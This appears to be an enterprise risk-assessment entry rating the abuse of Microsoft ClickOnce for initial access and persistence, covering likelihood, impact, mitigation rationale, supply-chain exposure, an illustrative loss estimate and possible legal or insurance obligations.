Likelihood: MODERATE
Impact: HIGH
Treatment: MITIGATE
Confidence: Moderate
Likelihood is moderate because exploitation of ClickOnce as an initial-access and persistence vector requires attacker delivery (phishing, watering hole, or supply-chain lure) but does NOT require admin privileges or a patch-addressable vulnerability, and CrowdStrike has documented the technique as an active, maturing pattern against broadly deployed Windows enterprise environments with no current detection coverage in most stacks. Impact is high because successful abuse yields durable, low-visibility persistence on employee workstations — extending dwell time, increasing data-exfiltration and lateral-movement exposure, and operating entirely outside the privilege-escalation alerting that most SOC playbooks depend on.
Treatment rationale: No patch is available and the feature cannot be trivially disabled without operational disruption, so the only viable primary treatment is deliberate investment in compensating detection controls, ClickOnce allowlisting policy, and user-awareness measures to reduce the delivery vector.
Third-Party / Supply-Chain Risk
Organizations that rely on third-party software vendors or internal development teams distributing applications via ClickOnce share the same trusted-deployment channel an attacker would abuse; a compromised or spoofed ClickOnce manifest delivered through a vendor update pipeline, partner portal, or shared software repository could propagate malicious payloads across the supply chain without triggering vendor-management controls — consistent with NIST SP 800-161 concerns around trusted third-party software distribution integrity.
Loss Exposure (illustrative)
Magnitude: Moderate to high — illustrative $250K–$2M per incident, driven primarily by incident response labor, forensic investigation of low-visibility dwell time, potential data-exfiltration remediation, and reputational costs if persistence goes undetected for an extended period.
Frequency: Illustrative 1–2 incidents per 3-year horizon for a mid-to-large enterprise with no ClickOnce monitoring, given the technique's documented maturity, privilege-free execution, and absence of detection coverage in most standard security stacks.
Annualized: Illustrative ALE of approximately $100K–$200K annually, derived from loss magnitude midpoint (~$750K) multiplied by illustrative frequency (~0.4–0.5 events/year).
Basis: Loss magnitude reflects incident response and forensic investigation costs associated with a long-dwell intrusion (IR labor, endpoint reimaging, potential data-loss assessment), not a breach with confirmed exfiltration. Frequency reflects the privilege-free, detection-evading nature of the technique against an unmonitored attack surface, weighted against the fact that exploitation still requires a successful delivery mechanism. No third-party breach-cost reports cited.
Illustrative estimate — not actuarially derived.
Insurance / Contractual / Legal — Potential Obligations
Potential triggers, not legal determinations. Verify with counsel/broker before acting.
• If a ClickOnce-based intrusion results in unauthorized access to employee or customer PII, this may invoke state and federal breach-notification obligations — verify with counsel.
• Extended dwell time and low-visibility persistence resulting from this technique could affect cyber-insurance claim adjudication related to timely detection and response requirements — verify with broker.
• If a third-party software vendor's ClickOnce distribution channel is the delivery mechanism, this may trigger contractual incident-notification clauses in vendor agreements — verify with counsel.
